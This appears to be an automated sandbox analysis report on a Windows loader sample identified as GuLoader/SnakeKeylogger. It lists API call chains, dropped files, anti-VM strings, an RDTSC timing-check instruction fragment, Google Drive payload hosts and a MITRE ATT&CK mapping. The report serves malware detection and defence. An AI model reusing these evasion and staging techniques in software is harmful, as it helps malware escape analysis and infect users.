      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405331
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 2_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_0040335A
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00404B6E0_2_00404B6E
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040659D0_2_0040659D
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 2_2_00404B6E2_2_00404B6E
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 2_2_0040659D2_2_0040659D
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: String function: 00402B3A appears 49 times
      Source: fTSt7dc60O.exe, 00000000.00000000.1304783093.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs fTSt7dc60O.exe
      Source: fTSt7dc60O.exe, 00000002.00000000.1429065679.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs fTSt7dc60O.exe
      Source: fTSt7dc60O.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal68.troj.evad.winEXE@3/10@2/2
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404635
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile created: C:\Users\user\subacidity.lnkJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile created: C:\Users\user\AppData\Local\Temp\nsmE72.tmpJump to behavior
      Source: fTSt7dc60O.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: fTSt7dc60O.exeReversingLabs: Detection: 66%
      Source: fTSt7dc60O.exeVirustotal: Detection: 77%
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile read: C:\Users\user\Desktop\fTSt7dc60O.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\fTSt7dc60O.exe "C:\Users\user\Desktop\fTSt7dc60O.exe"
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess created: C:\Users\user\Desktop\fTSt7dc60O.exe "C:\Users\user\Desktop\fTSt7dc60O.exe"
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess created: C:\Users\user\Desktop\fTSt7dc60O.exe "C:\Users\user\Desktop\fTSt7dc60O.exe"Jump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: subacidity.lnk.0.drLNK file: ..\..\Program Files (x86)\Common Files\cutline.sil
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
      Source: fTSt7dc60O.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000002.00000002.3153038380.000000000219B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1432262066.000000000551B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile created: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeAPI/Special instruction interceptor: Address: 58E08B6
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeAPI/Special instruction interceptor: Address: 25608B6
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeRDTSC instruction interceptor: First address: 589C57D second address: 589C57D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F6734BDFE22h 0x00000006 push edi 0x00000007 mov edi, 000000AEh 0x0000000c cmp edi, 1E8A5BDCh 0x00000012 jg 00007F6734C24D09h 0x00000018 pop edi 0x00000019 cmp dl, 0000006Eh 0x0000001c inc ebp 0x0000001d inc ebx 0x0000001e test cl, al 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeRDTSC instruction interceptor: First address: 251C57D second address: 251C57D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F6734502782h 0x00000006 push edi 0x00000007 mov edi, 000000AEh 0x0000000c cmp edi, 1E8A5BDCh 0x00000012 jg 00007F6734547669h 0x00000018 pop edi 0x00000019 cmp dl, 0000006Eh 0x0000001c inc ebp 0x0000001d inc ebx 0x0000001e test cl, al 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\fTSt7dc60O.exe TID: 8096Thread sleep time: -100000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 2_2_00402770 FindFirstFileW,2_2_00402770
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_004057D0
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
      Source: fTSt7dc60O.exe, 00000000.00000002.1430931275.000000000076E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: fTSt7dc60O.exe, 00000002.00000003.2039004039.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.0000000007168000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906189082.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928334150.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841391848.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906189082.000000000718E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071C6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2782922250.00000000071BF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928334150.00000000071C7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071C6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906189082.00000000071BF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071BF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
      Source: fTSt7dc60O.exe, 00000000.00000002.1430931275.000000000076E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\00s
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeAPI call chain: ExitProcess graph end nodegraph_0-4665
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeAPI call chain: ExitProcess graph end nodegraph_0-4660
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess created: C:\Users\user\Desktop\fTSt7dc60O.exe "C:\Users\user\Desktop\fTSt7dc60O.exe"Jump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00405F6A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F6A

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager3
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      fTSt7dc60O.exe67%ReversingLabsWin32.Trojan.SnakeKeylogger
      fTSt7dc60O.exe77%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.google.comJJ0%Avira URL Cloudsafe
      https://www.google.comJ0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		216.58.206.78
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.185.97
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comfTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://www.google.comJJfTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://translate.google.com/translate_a/element.jsfTSt7dc60O.exe, 00000002.00000003.2782832778.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894405292.0000000007235000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161570317.0000000007237000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2038964146.000000000722C000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2039004039.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563473880.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2537573153.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1917297721.000000000723A000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2294964216.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2527520859.000000000722D000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.000000000722C000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1674532367.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.0000000007168000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.3142974272.0000000007235000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659181936.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2295073701.000000000722C000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284013765.0000000007235000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://drive.google.com/fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://drive.google.com/rtfTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://drive.google.com/ertificatesfTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://drive.google.com/0fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com:fTSt7dc60O.exe, 00000002.00000003.2906189082.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://drive.google.com/crosoftfTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://drive.usercontent.google.com/fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1674532367.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1917391196.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563404234.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://apis.google.comfTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://nsis.sf.net/NSIS_ErrorErrorfTSt7dc60O.exe, 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmp, fTSt7dc60O.exe, 00000000.00000000.1304762814.0000000000409000.00000008.00000001.01000000.00000003.sdmp, fTSt7dc60O.exe, 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                		high
                                https://drive.google.com/gfTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1674532367.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.google.com/$fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
